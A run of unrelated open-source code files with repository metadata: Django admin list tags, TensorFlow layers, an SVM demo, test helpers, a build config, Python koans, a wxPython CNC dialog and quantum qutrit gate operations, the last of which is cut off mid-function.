rooshilp/CMPUT410Lab6 | virt_env/virt1/lib/python2.7/site-packages/django/contrib/admin/templatetags/admin_list.py | 75 | 17069 | from __future__ import unicode_literals
import datetime
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from django.contrib.admin.utils import (lookup_field, display_for_field,
display_for_value, label_for_field)
from django.contrib.admin.views.main import (ALL_VAR, EMPTY_CHANGELIST_VALUE,
ORDER_VAR, PAGE_VAR, SEARCH_VAR)
from django.contrib.admin.templatetags.admin_static import static
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import NoReverseMatch
from django.db import models
from django.utils import formats
from django.utils.html import escapejs, format_html
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from django.utils.encoding import force_text
from django.template import Library
from django.template.loader import get_template
from django.template.context import Context
register = Library()
DOT = '.'
@register.simple_tag
def paginator_number(cl, i):
"""
Generates an individual page index link in a paginated list.
"""
if i == DOT:
return '... '
elif i == cl.page_num:
return format_html('<span class="this-page">{0}</span> ', i + 1)
else:
return format_html('<a href="{0}"{1}>{2}</a> ',
cl.get_query_string({PAGE_VAR: i}),
mark_safe(' class="end"' if i == cl.paginator.num_pages - 1 else ''),
i + 1)
@register.inclusion_tag('admin/pagination.html')
def pagination(cl):
"""
Generates the series of links to the pages in a paginated list.
"""
paginator, page_num = cl.paginator, cl.page_num
pagination_required = (not cl.show_all or not cl.can_show_all) and cl.multi_page
if not pagination_required:
page_range = []
else:
ON_EACH_SIDE = 3
ON_ENDS = 2
# If there are 10 or fewer pages, display links to every page.
# Otherwise, do some fancy
if paginator.num_pages <= 10:
page_range = range(paginator.num_pages)
else:
# Insert "smart" pagination links, so that there are always ON_ENDS
# links at either end of the list of pages, and there are always
# ON_EACH_SIDE links at either end of the "current page" link.
page_range = []
if page_num > (ON_EACH_SIDE + ON_ENDS):
page_range.extend(range(0, ON_ENDS))
page_range.append(DOT)
page_range.extend(range(page_num - ON_EACH_SIDE, page_num + 1))
else:
page_range.extend(range(0, page_num + 1))
if page_num < (paginator.num_pages - ON_EACH_SIDE - ON_ENDS - 1):
page_range.extend(range(page_num + 1, page_num + ON_EACH_SIDE + 1))
page_range.append(DOT)
page_range.extend(range(paginator.num_pages - ON_ENDS, paginator.num_pages))
else:
page_range.extend(range(page_num + 1, paginator.num_pages))
need_show_all_link = cl.can_show_all and not cl.show_all and cl.multi_page
return {
'cl': cl,
'pagination_required': pagination_required,
'show_all_url': need_show_all_link and cl.get_query_string({ALL_VAR: ''}),
'page_range': page_range,
'ALL_VAR': ALL_VAR,
'1': 1,
}
def result_headers(cl):
"""
Generates the list column headers.
"""
ordering_field_columns = cl.get_ordering_field_columns()
for i, field_name in enumerate(cl.list_display):
text, attr = label_for_field(
field_name, cl.model,
model_admin=cl.model_admin,
return_attr=True
)
if attr:
# Potentially not sortable
# if the field is the action checkbox: no sorting and special class
if field_name == 'action_checkbox':
yield {
"text": text,
"class_attrib": mark_safe(' class="action-checkbox-column"'),
"sortable": False,
}
continue
admin_order_field = getattr(attr, "admin_order_field", None)
if not admin_order_field:
# Not sortable
yield {
"text": text,
"class_attrib": format_html(' class="column-{0}"', field_name),
"sortable": False,
}
continue
# OK, it is sortable if we got this far
th_classes = ['sortable', 'column-{0}'.format(field_name)]
order_type = ''
new_order_type = 'asc'
sort_priority = 0
sorted = False
# Is it currently being sorted on?
if i in ordering_field_columns:
sorted = True
order_type = ordering_field_columns.get(i).lower()
sort_priority = list(ordering_field_columns).index(i) + 1
th_classes.append('sorted %sending' % order_type)
new_order_type = {'asc': 'desc', 'desc': 'asc'}[order_type]
# build new ordering param
o_list_primary = [] # URL for making this field the primary sort
o_list_remove = [] # URL for removing this field from sort
o_list_toggle = [] # URL for toggling order type for this field
make_qs_param = lambda t, n: ('-' if t == 'desc' else '') + str(n)
for j, ot in ordering_field_columns.items():
if j == i: # Same column
param = make_qs_param(new_order_type, j)
# We want clicking on this header to bring the ordering to the
# front
o_list_primary.insert(0, param)
o_list_toggle.append(param)
# o_list_remove - omit
else:
param = make_qs_param(ot, j)
o_list_primary.append(param)
o_list_toggle.append(param)
o_list_remove.append(param)
if i not in ordering_field_columns:
o_list_primary.insert(0, make_qs_param(new_order_type, i))
yield {
"text": text,
"sortable": True,
"sorted": sorted,
"ascending": order_type == "asc",
"sort_priority": sort_priority,
"url_primary": cl.get_query_string({ORDER_VAR: '.'.join(o_list_primary)}),
"url_remove": cl.get_query_string({ORDER_VAR: '.'.join(o_list_remove)}),
"url_toggle": cl.get_query_string({ORDER_VAR: '.'.join(o_list_toggle)}),
"class_attrib": format_html(' class="{0}"', ' '.join(th_classes)) if th_classes else '',
}
def _boolean_icon(field_val):
icon_url = static('admin/img/icon-%s.gif' %
{True: 'yes', False: 'no', None: 'unknown'}[field_val])
return format_html('<img src="{0}" alt="{1}" />', icon_url, field_val)
def items_for_result(cl, result, form):
"""
Generates the actual list of data.
"""
def link_in_col(is_first, field_name, cl):
if cl.list_display_links is None:
return False
if is_first and not cl.list_display_links:
return True
return field_name in cl.list_display_links
first = True
pk = cl.lookup_opts.pk.attname
for field_name in cl.list_display:
row_classes = ['field-%s' % field_name]
try:
f, attr, value = lookup_field(field_name, result, cl.model_admin)
except ObjectDoesNotExist:
result_repr = EMPTY_CHANGELIST_VALUE
else:
if f is None:
if field_name == 'action_checkbox':
row_classes = ['action-checkbox']
allow_tags = getattr(attr, 'allow_tags', False)
boolean = getattr(attr, 'boolean', False)
if boolean:
allow_tags = True
result_repr = display_for_value(value, boolean)
# Strip HTML tags in the resulting text, except if the
# function has an "allow_tags" attribute set to True.
if allow_tags:
result_repr = mark_safe(result_repr)
if isinstance(value, (datetime.date, datetime.time)):
row_classes.append('nowrap')
else:
if isinstance(f.rel, models.ManyToOneRel):
field_val = getattr(result, f.name)
if field_val is None:
result_repr = EMPTY_CHANGELIST_VALUE
else:
result_repr = field_val
else:
result_repr = display_for_field(value, f)
if isinstance(f, (models.DateField, models.TimeField, models.ForeignKey)):
row_classes.append('nowrap')
if force_text(result_repr) == '':
result_repr = mark_safe(' ')
row_class = mark_safe(' class="%s"' % ' '.join(row_classes))
# If list_display_links not defined, add the link tag to the first field
if link_in_col(first, field_name, cl):
table_tag = 'th' if first else 'td'
first = False
# Display link to the result's change_view if the url exists, else
# display just the result's representation.
try:
url = cl.url_for_result(result)
except NoReverseMatch:
link_or_text = result_repr
else:
url = add_preserved_filters({'preserved_filters': cl.preserved_filters, 'opts': cl.opts}, url)
# Convert the pk to something that can be used in Javascript.
# Problem cases are long ints (23L) and non-ASCII strings.
if cl.to_field:
attr = str(cl.to_field)
else:
attr = pk
value = result.serializable_value(attr)
result_id = escapejs(value)
link_or_text = format_html(
'<a href="{0}"{1}>{2}</a>',
url,
format_html(' onclick="opener.dismissRelatedLookupPopup(window, '{0}'); return false;"', result_id) if cl.is_popup else '',
result_repr)
yield format_html('<{0}{1}>{2}</{3}>',
table_tag,
row_class,
link_or_text,
table_tag)
else:
# By default the fields come from ModelAdmin.list_editable, but if we pull
# the fields out of the form instead of list_editable custom admins
# can provide fields on a per request basis
if (form and field_name in form.fields and not (
field_name == cl.model._meta.pk.name and
form[cl.model._meta.pk.name].is_hidden)):
bf = form[field_name]
result_repr = mark_safe(force_text(bf.errors) + force_text(bf))
yield format_html('<td{0}>{1}</td>', row_class, result_repr)
if form and not form[cl.model._meta.pk.name].is_hidden:
yield format_html('<td>{0}</td>', force_text(form[cl.model._meta.pk.name]))
class ResultList(list):
# Wrapper class used to return items in a list_editable
# changelist, annotated with the form object for error
# reporting purposes. Needed to maintain backwards
# compatibility with existing admin templates.
def __init__(self, form, *items):
self.form = form
super(ResultList, self).__init__(*items)
def results(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
yield ResultList(form, items_for_result(cl, res, form))
else:
for res in cl.result_list:
yield ResultList(None, items_for_result(cl, res, None))
def result_hidden_fields(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
if form[cl.model._meta.pk.name].is_hidden:
yield mark_safe(force_text(form[cl.model._meta.pk.name]))
@register.inclusion_tag("admin/change_list_results.html")
def result_list(cl):
"""
Displays the headers and data list together
"""
headers = list(result_headers(cl))
num_sorted_fields = 0
for h in headers:
if h['sortable'] and h['sorted']:
num_sorted_fields += 1
return {'cl': cl,
'result_hidden_fields': list(result_hidden_fields(cl)),
'result_headers': headers,
'num_sorted_fields': num_sorted_fields,
'results': list(results(cl))}
@register.inclusion_tag('admin/date_hierarchy.html')
def date_hierarchy(cl):
"""
Displays the date hierarchy for date drill-down functionality.
"""
if cl.date_hierarchy:
field_name = cl.date_hierarchy
field = cl.opts.get_field_by_name(field_name)[0]
dates_or_datetimes = 'datetimes' if isinstance(field, models.DateTimeField) else 'dates'
year_field = '%s__year' % field_name
month_field = '%s__month' % field_name
day_field = '%s__day' % field_name
field_generic = '%s__' % field_name
year_lookup = cl.params.get(year_field)
month_lookup = cl.params.get(month_field)
day_lookup = cl.params.get(day_field)
link = lambda filters: cl.get_query_string(filters, [field_generic])
if not (year_lookup or month_lookup or day_lookup):
# select appropriate start level
date_range = cl.queryset.aggregate(first=models.Min(field_name),
last=models.Max(field_name))
if date_range['first'] and date_range['last']:
if date_range['first'].year == date_range['last'].year:
year_lookup = date_range['first'].year
if date_range['first'].month == date_range['last'].month:
month_lookup = date_range['first'].month
if year_lookup and month_lookup and day_lookup:
day = datetime.date(int(year_lookup), int(month_lookup), int(day_lookup))
return {
'show': True,
'back': {
'link': link({year_field: year_lookup, month_field: month_lookup}),
'title': capfirst(formats.date_format(day, 'YEAR_MONTH_FORMAT'))
},
'choices': [{'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))}]
}
elif year_lookup and month_lookup:
days = cl.queryset.filter(**{year_field: year_lookup, month_field: month_lookup})
days = getattr(days, dates_or_datetimes)(field_name, 'day')
return {
'show': True,
'back': {
'link': link({year_field: year_lookup}),
'title': str(year_lookup)
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month_lookup, day_field: day.day}),
'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))
} for day in days]
}
elif year_lookup:
months = cl.queryset.filter(**{year_field: year_lookup})
months = getattr(months, dates_or_datetimes)(field_name, 'month')
return {
'show': True,
'back': {
'link': link({}),
'title': _('All dates')
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month.month}),
'title': capfirst(formats.date_format(month, 'YEAR_MONTH_FORMAT'))
} for month in months]
}
else:
years = getattr(cl.queryset, dates_or_datetimes)(field_name, 'year')
return {
'show': True,
'choices': [{
'link': link({year_field: str(year.year)}),
'title': str(year.year),
} for year in years]
}
@register.inclusion_tag('admin/search_form.html')
def search_form(cl):
"""
Displays a search form for searching the list.
"""
return {
'cl': cl,
'show_result_count': cl.result_count != cl.full_result_count,
'search_var': SEARCH_VAR
}
@register.simple_tag
def admin_list_filter(cl, spec):
tpl = get_template(spec.template)
return tpl.render(Context({
'title': spec.title,
'choices': list(spec.choices(cl)),
'spec': spec,
}))
@register.inclusion_tag('admin/actions.html', takes_context=True)
def admin_actions(context):
"""
Track the number of times the action field has been rendered on the page,
so we know which value to use.
"""
context['action_index'] = context.get('action_index', -1) + 1
return context
| apache-2.0 |
crackhopper/TFS-toolbox | tfs/core/layer/normalization.py | 1 | 1965 | import tensorflow as tf
import numpy as np
from tfs.core.layer import ops as ops
from tfs.core.layer.base import Layer
import tfs.core.initializer.init_func as init
from tfs.core.util import get_arg_dict
class LRN(Layer):
def __init__(self,
net,
radius,
alpha,
beta,
bias=1.0,
name=None,
print_names=['radius','alpha','beta']
):
vtable = get_arg_dict(excludes=['self','net'])
super(LRN,self).__init__(net,**vtable)
def _build(self):
inTensor = self._in
output = tf.nn.local_response_normalization(
inTensor,
depth_radius=self.param.radius,
alpha=self.param.alpha,
beta=self.param.beta,
bias=self.param.bias,
name=self.name)
return output
class BN(Layer):
def __init__(self,
net,
scale_offset=True,
activation=ops.relu,
name=None,
print_names=[]
):
vtable = get_arg_dict(excludes=['self','net'])
super(BN,self).__init__(net,**vtable)
def _build(self):
inTensor = self._in
input_shape = inTensor.get_shape()
scale_offset = self.param.scale_offset
shape = [input_shape[-1]]
if scale_offset:
scale = self._make_variable('scale', shape=shape,init=init.constant())
offset = self._make_variable('offset', shape=shape,init=init.constant())
else:
scale, offset = (None, None)
output = tf.nn.batch_normalization(
inTensor,
mean=self._make_variable('mean', shape=shape,init=init.constant()),
variance=self._make_variable('variance', shape=shape,init=init.constant()),
offset=offset,
scale=scale,
# TODO: This is the default Caffe batch norm eps
# Get the actual eps from parameters
variance_epsilon=1e-5,
name=self.name)
if self.param.activation:
output = self.param.activation(output)
return output
| mit |
nav13n/Data-Science-45min-Intros | support-vector-machines-101/rbf-circles.py | 26 | 1504 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
__author__="Josh Montague"
__license__="MIT License"
import sys
import json
import numpy as np
import matplotlib.pyplot as plt
try:
import seaborn as sns
except ImportError as e:
sys.stderr.write("seaborn not installed. Using default matplotlib templates.")
from sklearn.svm import SVC
from sklearn.datasets import make_circles
# adapted from:
# http://scikit-learn.org/stable/auto_examples/svm/plot_svm_kernels.html
# http://scikit-learn.org/stable/auto_examples/decomposition/plot_kernel_pca.html
xx, yy = make_circles(n_samples=500, factor=0.1, noise=0.15)
clf = SVC(kernel='rbf')
clf.fit(xx, yy)
plt.figure(figsize=(8,6))
plt.scatter(clf.support_vectors_[:, 0], clf.support_vectors_[:, 1],
facecolors='none', zorder=10, s=300)
plt.scatter(xx[:, 0], xx[:, 1], c=yy, zorder=10, cmap=plt.cm.Paired, s=100)
#plt.scatter(xx[:, 0], xx[:, 1], c=yy, zorder=10, s=100)
plt.axis('tight')
x_min = -1.5
x_max = 1.5
y_min = -1.5
y_max = 1.5
XX, YY = np.mgrid[x_min:x_max:200j, y_min:y_max:200j]
Z = clf.decision_function(np.c_[XX.ravel(), YY.ravel()])
# Put the result into a color plot
Z = Z.reshape(XX.shape)
#plt.figure(fignum, figsize=(4, 3))
#plt.pcolormesh(XX, YY, Z > 0, cmap=plt.cm.Paired)
plt.pcolormesh(XX, YY, Z > 0, alpha=0.1)
plt.contour(XX, YY, Z, colors=['k', 'k', 'k'], linestyles=['--', '-', '--'],
levels=[-.5, 0, .5])
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.title('rbf kernel')
plt.show()
| unlicense |
CiscoSystems/vespa | neutron/tests/unit/extensions/v2attributes.py | 68 | 1555 | # Copyright (c) 2012 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
EXTENDED_ATTRIBUTES_2_0 = {
'networks': {
'v2attrs:something': {'allow_post': False,
'allow_put': False,
'is_visible': True},
'v2attrs:something_else': {'allow_post': True,
'allow_put': False,
'is_visible': False},
}
}
class V2attributes(object):
def get_name(self):
return "V2 Extended Attributes Example"
def get_alias(self):
return "v2attrs"
def get_description(self):
return "Demonstrates extended attributes on V2 core resources"
def get_namespace(self):
return "http://docs.openstack.org/ext/examples/v2attributes/api/v1.0"
def get_updated(self):
return "2012-07-18T10:00:00-00:00"
def get_extended_resources(self, version):
if version == "2.0":
return EXTENDED_ATTRIBUTES_2_0
else:
return {}
| apache-2.0 |
chrismeyersfsu/ansible | test/units/mock/procenv.py | 24 | 2516 | # (c) 2016, Matt Davis <mdavis@ansible.com>
# (c) 2016, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import json
from contextlib import contextmanager
from io import BytesIO, StringIO
from ansible.compat.six import PY3
from ansible.compat.tests import unittest
from ansible.module_utils._text import to_bytes
@contextmanager
def swap_stdin_and_argv(stdin_data='', argv_data=tuple()):
"""
context manager that temporarily masks the test runner's values for stdin and argv
"""
real_stdin = sys.stdin
if PY3:
sys.stdin = StringIO(stdin_data)
sys.stdin.buffer = BytesIO(to_bytes(stdin_data))
else:
sys.stdin = BytesIO(to_bytes(stdin_data))
real_argv = sys.argv
sys.argv = argv_data
yield
sys.stdin = real_stdin
sys.argv = real_argv
@contextmanager
def swap_stdout():
"""
context manager that temporarily replaces stdout for tests that need to verify output
"""
old_stdout = sys.stdout
if PY3:
fake_stream = StringIO()
else:
fake_stream = BytesIO()
sys.stdout = fake_stream
yield fake_stream
sys.stdout = old_stdout
class ModuleTestCase(unittest.TestCase):
def setUp(self, module_args=None):
if module_args is None:
module_args = {}
args = json.dumps(dict(ANSIBLE_MODULE_ARGS=module_args))
# unittest doesn't have a clean place to use a context manager, so we have to enter/exit manually
self.stdin_swap = swap_stdin_and_argv(stdin_data=args)
self.stdin_swap.__enter__()
def tearDown(self):
# unittest doesn't have a clean place to use a context manager, so we have to enter/exit manually
self.stdin_swap.__exit__(None, None, None)
| gpl-3.0 |
HarisunnYT/GraphicsEngine | tinyobjloader-master/tests/config-posix.py | 5 | 1347 | exe = "tester"
# "gnu" or "clang"
toolchain = "gnu"
# optional
link_pool_depth = 1
# optional
builddir = {
"gnu" : "build"
, "msvc" : "build"
, "clang" : "build"
}
includes = {
"gnu" : [ "-I." ]
, "msvc" : [ "/I." ]
, "clang" : [ "-I." ]
}
defines = {
"gnu" : [ ]
, "msvc" : [ ]
, "clang" : [ ]
}
cflags = {
"gnu" : [ "-O2", "-g" ]
, "msvc" : [ "/O2" ]
, "clang" : [ "-O2", "-g" ]
}
# Warn as much as possible: http://qiita.com/MitsutakaTakeda/items/6b9966f890cc9b944d75
cxxflags = {
"gnu" : [ "-O2", "-g", "-pedantic -Wall -Wextra -Wcast-align -Wcast-qual -Wctor-dtor-privacy -Wdisabled-optimization -Wformat=2 -Winit-self -Wmissing-declarations -Wmissing-include-dirs -Wold-style-cast -Woverloaded-virtual -Wredundant-decls -Wshadow -Wsign-conversion -Wsign-promo -Wstrict-overflow=5 -Wswitch-default -Wundef -Werror -Wno-unused", "-fsanitize=address" ]
, "msvc" : [ "/O2", "/W4" ]
, "clang" : [ "-O2", "-g", "-Werror -Weverything -Wno-c++98-compat -Wno-c++98-compat-pedantic", "-fsanitize=address" ]
}
ldflags = {
"gnu" : [ "-fsanitize=address" ]
, "msvc" : [ ]
, "clang" : [ "-fsanitize=address" ]
}
cxx_files = [ "tester.cc" ]
c_files = [ ]
# You can register your own toolchain through register_toolchain function
def register_toolchain(ninja):
pass
| mit |
aishraj/pykons_solution | python3/koans/about_modules.py | 33 | 2373 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This is very different to AboutModules in Ruby Koans
# Our AboutMultipleInheritance class is a little more comparable
#
from runner.koan import *
from .another_local_module import *
from .local_module_with_all_defined import *
class AboutModules(Koan):
def test_importing_other_python_scripts_as_modules(self):
from . import local_module # local_module.py
duck = local_module.Duck()
self.assertEqual(__, duck.name)
def test_importing_attributes_from_classes_using_from_keyword(self):
from .local_module import Duck
duck = Duck() # no module qualifier needed this time
self.assertEqual(__, duck.name)
def test_we_can_import_multiple_items_at_once(self):
from . import jims, joes
jims_dog = jims.Dog()
joes_dog = joes.Dog()
self.assertEqual(__, jims_dog.identify())
self.assertEqual(__, joes_dog.identify())
def test_importing_all_module_attributes_at_once(self):
# NOTE Using this module level import declared at the top of this script:
# from .other_local_module import *
#
# Import wildcard cannot be used from within classes or functions
goose = Goose()
hamster = Hamster()
self.assertEqual(__, goose.name)
self.assertEqual(__, hamster.name)
def test_modules_hide_attributes_prefixed_by_underscores(self):
with self.assertRaises(___): private_squirrel = _SecretSquirrel()
def test_private_attributes_are_still_accessible_in_modules(self):
from .local_module import Duck # local_module.py
duck = Duck()
self.assertEqual(__, duck._password)
# module level attribute hiding doesn't affect class attributes
# (unless the class itself is hidden).
def test_a_module_can_choose_which_attributes_are_available_to_wildcards(self):
# NOTE Using this module level import declared at the top of this script:
# from .local_module_with_all_defined import *
# 'Goat' is on the __ALL__ list
goat = Goat()
self.assertEqual(__, goat.name)
# How about velociraptors?
lizard = _Velociraptor()
self.assertEqual(__, lizard.name)
# SecretDuck? Never heard of her!
with self.assertRaises(___): duck = SecretDuck()
| mit |
elliotf/heekscnc | pycnc/wxProgramDlg.py | 25 | 3443 | import wx
import HeeksCNC
from Program import Program
from wxHDialog import HDialog
from wxPictureWindow import PictureWindow
from wxNiceTextCtrl import LengthCtrl
from wxNiceTextCtrl import DoubleCtrl
from wxNiceTextCtrl import GeomCtrl
from consts import *
class ProgramDlg(HDialog):
def __init__(self, program):
HDialog.__init__(self, "Program")
self.program = program
self.ignore_event_functions = True
sizerMain = wx.BoxSizer(wx.VERTICAL)
# add the controls in one column
self.machines = program.GetMachines()
choices = []
for machine in self.machines:
choices.append(machine.description)
self.cmbMachine = wx.ComboBox(self, choices = choices)
self.AddLabelAndControl(sizerMain, "machine", self.cmbMachine)
self.chkOutputSame = wx.CheckBox( self, label = "output file name follows data file name" )
sizerMain.Add( self.chkOutputSame, 0, wx.ALL, self.control_border )
self.txtOutputFile = wx.TextCtrl(self)
self.lblOutputFile, self.btnOutputFile = self.AddFileNameControl(sizerMain, "output file", self.txtOutputFile)
self.cmbUnits = wx.ComboBox(self, choices = ["mm", "inch"])
self.AddLabelAndControl(sizerMain, "units", self.cmbUnits)
# to do "Raw Material" and "Brinell Hardness of raw material"
# add OK and Cancel
sizerOKCancel = self.MakeOkAndCancel(wx.HORIZONTAL)
sizerMain.Add( sizerOKCancel, 0, wx.ALL + wx.ALIGN_RIGHT + wx.ALIGN_BOTTOM, self.control_border )
self.SetFromData()
self.EnableControls()
self.SetSizer( sizerMain )
sizerMain.SetSizeHints(self)
sizerMain.Fit(self)
self.cmbMachine.SetFocus()
self.ignore_event_functions = False
self.Bind(wx.EVT_CHECKBOX, self.OnCheckOutputSame, self.chkOutputSame)
def EnableControls(self):
output_same = self.chkOutputSame.GetValue()
self.txtOutputFile.Enable(output_same == False)
self.btnOutputFile.Enable(output_same == False)
self.lblOutputFile.Enable(output_same == False)
def OnCheckOutputSame(self, event):
if self.ignore_event_functions: return
self.EnableControls()
def GetData(self):
if self.ignore_event_functions: return
self.ignore_event_functions = True
if self.cmbMachine.GetSelection() != wx.NOT_FOUND:
self.program.machine = self.machines[self.cmbMachine.GetSelection()]
self.program.output_file_name_follows_data_file_name = self.chkOutputSame.GetValue()
self.program.output_file = self.txtOutputFile.GetValue()
if self.cmbUnits.GetValue() == "inch":
self.program.units = 25.4
else:
self.program.units = 1.0
self.ignore_event_functions = False
def SetFromData(self):
self.ignore_event_functions = True
self.cmbMachine.SetValue(self.program.machine.description)
self.chkOutputSame.SetValue(self.program.output_file_name_follows_data_file_name)
self.txtOutputFile.SetValue(self.program.output_file)
if self.program.units == 25.4:
self.cmbUnits.SetValue("inch")
else:
self.cmbUnits.SetValue("mm")
self.ignore_event_functions = False
| bsd-3-clause |
brianzi/quantumsim | quantumsim/operations/qutrits.py | 1 | 9767 | import numpy as np
from scipy.linalg import expm
from .. import bases
from .operation import Operation
from ..algebra.tools import verify_kraus_unitarity
_PAULI = dict(zip(['I', 'X', 'Y', 'Z'], bases.gell_mann(2).vectors))
bases1_default = (bases.general(3),)
bases2_default = bases1_default * 2
def rotate_euler(phi, theta, lamda):
"""A perfect single qubit rotation described by three Euler angles.
Unitary operation, that corresponds to this rotation, is:
.. math::
U = R_Z(\\phi) \\cdot R_X(\\theta) \\cdot R_Z(\\lambda)
Parameters
----------
phi, theta, lamda: float
Euler rotation angles in radians.
Returns
-------
Operation
An operation, that corresponds to the rotation.
"""
exp_phi, exp_lambda = np.exp(1j * phi), np.exp(1j * lamda)
sin_theta, cos_theta = np.sin(theta / 2), np.cos(theta / 2)
matrix = np.array([
[cos_theta, -1j * exp_lambda * sin_theta, 0],
[-1j * exp_phi * sin_theta, exp_phi * exp_lambda * cos_theta, 0],
[0, 0, 1]])
return Operation.from_kraus(matrix, bases1_default)
def rotate_x(angle=np.pi):
"""A perfect single qubit rotation around :math:`Ox` axis.
Parameters
----------
angle: float, optional
Rotation angle in radians. Default is :math:`\\pi`.
Returns
-------
Operation
An operation, that corresponds to the rotation.
"""
sin, cos = np.sin(angle / 2), np.cos(angle / 2)
matrix = np.array([[cos, -1j * sin, 0], [-1j * sin, cos, 0], [0, 0, 1]])
return Operation.from_kraus(matrix, bases1_default)
def rotate_y(angle=np.pi):
"""A perfect single qubit rotation around :math:`Oy` axis.
Parameters
----------
angle: float, optional
Rotation angle in radians. Default is :math:`\\pi`.
Returns
-------
Operation
An operation, that corresponds to the rotation.
"""
sin, cos = np.sin(angle / 2), np.cos(angle / 2)
matrix = np.array([[cos, -sin, 0], [sin, cos, 0], [0, 0, 1]])
return Operation.from_kraus(matrix, bases1_default)
def rotate_z(angle=np.pi):
"""A perfect single qubit rotation around :math:`Oz` axis.
Parameters
----------
angle: float, optional
Rotation angle in radians. Default is :math:`\\pi`.
Returns
-------
Operation
An operation, that corresponds to the rotation.
"""
exp = np.exp(-1j * angle / 2)
matrix = np.diag([exp, exp.conj(), 1])
return Operation.from_kraus(matrix, bases1_default)
def phase_shift(angle=np.pi):
matrix = np.diag([1, np.exp(1j * angle), 1])
return Operation.from_kraus(matrix, bases1_default)
def hadamard():
"""A perfect Hadamard operation.
Returns
-------
Operation
An operation, that corresponds to the rotation.
"""
s = np.sqrt(0.5)
matrix = np.array([[s, s, 0], [s, -s, 0], [0, 0, 1]])
return Operation.from_kraus(matrix, bases1_default)
default_cphase_params = dict(
leakage_rate=0.,
leakage_phase=-np.pi/2,
leakage_mobility_rate=0.,
leakage_mobility_phase=0.,
phase_22=0.,
q0_t1=np.inf,
q0_t2=np.inf,
q1_t1=np.inf,
q1_t2=np.inf,
q1_t2_int=None,
q0_anharmonicity=0.,
q1_anharmonicity=0.,
rise_time=2,
int_time=28,
phase_corr_time=12,
phase_corr_error=0.,
quasistatic_flux=0.,
sensitivity=0.,
phase_diff_02_12=np.pi,
phase_diff_20_21=0.,
)
def cphase(angle=np.pi, *, model='legacy', **kwargs):
"""
Parameters
----------
angle : float
Conditional phase of a CPhase gate, default is :math:`\\pi`.
model : str
Error model (currently only 'legacy' and 'NetZero' is implemented).
**kwargs
Parameters for the error model.
Returns
-------
Operation
Resulting CPhase operation. First qubit is static (low-frequency)
qubit,
"""
def p(name):
return kwargs.get(name, default_cphase_params[name])
for param in kwargs.keys():
if param not in default_cphase_params.keys():
raise ValueError('Unknown model parameter: {}'.format(param))
int_time = p('int_time')
leakage_rate = p('leakage_rate')
qstatic_deviation = int_time * np.pi * \
p('sensitivity') * (p('quasistatic_flux') ** 2)
qstatic_interf_leakage = (0.5 - (2 * leakage_rate)) * \
(1 - np.cos(1.5 * qstatic_deviation))
phase_corr_error = p('phase_corr_error')
rot_angle = angle + (1.5 * qstatic_deviation) + (2 * phase_corr_error)
if model.lower() == 'legacy':
cz_op = _cphase_legacy(angle, leakage_rate)
elif model.lower() == 'netzero':
ideal_unitary = expm(1j * _ideal_generator(
phase_10=phase_corr_error,
phase_01=phase_corr_error + qstatic_deviation,
phase_11=rot_angle,
phase_02=rot_angle,
phase_12=p('phase_diff_02_12') - rot_angle,
phase_20=0,
phase_21=p('phase_diff_20_21'),
phase_22=p('phase_22')
))
noisy_unitary = expm(1j * _exchange_generator(
leakage=4 * leakage_rate + qstatic_interf_leakage,
leakage_phase=p('leakage_phase'),
leakage_mobility_rate=p('leakage_mobility_rate'),
leakage_mobility_phase=p('leakage_mobility_phase'),
))
cz_unitary = ideal_unitary @ noisy_unitary
if not verify_kraus_unitarity(cz_unitary):
raise RuntimeError("CPhase gate is not unitary, "
"verify provided parameters.")
cz_op = Operation.from_kraus(cz_unitary, bases2_default)
else:
raise ValueError('Unknown CZ model: {}'.format(model))
return cz_op
def _cphase_legacy(angle=np.pi, leakage=0.):
"""A perfect controlled phase rotation.
First qubit is low-frequency, second qubit is high-frequency (it leaks).
Parameters
----------
angle: float, optional
Rotation angle in radians. Default is :math:`\\pi`.
leakage: float, optional
Leakage rate of a CPhase gate
Returns
-------
Operation
An operation, that corresponds to the rotation.
"""
dcphase = np.zeros((9, 9))
dcphase[2, 4] = 1
dcphase[4, 2] = 1
angle_frac = 1 - np.arcsin(np.sqrt(leakage)) / np.pi
unitary = expm(-1j * angle * angle_frac * dcphase)
return Operation.from_kraus(unitary, bases2_default)
def _ideal_generator(phase_01,
phase_02,
phase_10,
phase_11,
phase_12,
phase_20,
phase_21,
phase_22):
phases = np.array([0, phase_01, phase_02, phase_10,
phase_11, phase_12, phase_20, phase_21, phase_22])
generator = np.diag(phases).astype(complex)
return generator
def _exchange_generator(leakage, leakage_phase,
leakage_mobility_rate, leakage_mobility_phase):
generator = np.zeros((9, 9), dtype=complex)
generator[2][4] = 1j * \
np.arcsin(np.sqrt(leakage)) * np.exp(1j * leakage_phase)
generator[4][2] = -1j * \
np.arcsin(np.sqrt(leakage)) * np.exp(-1j * leakage_phase)
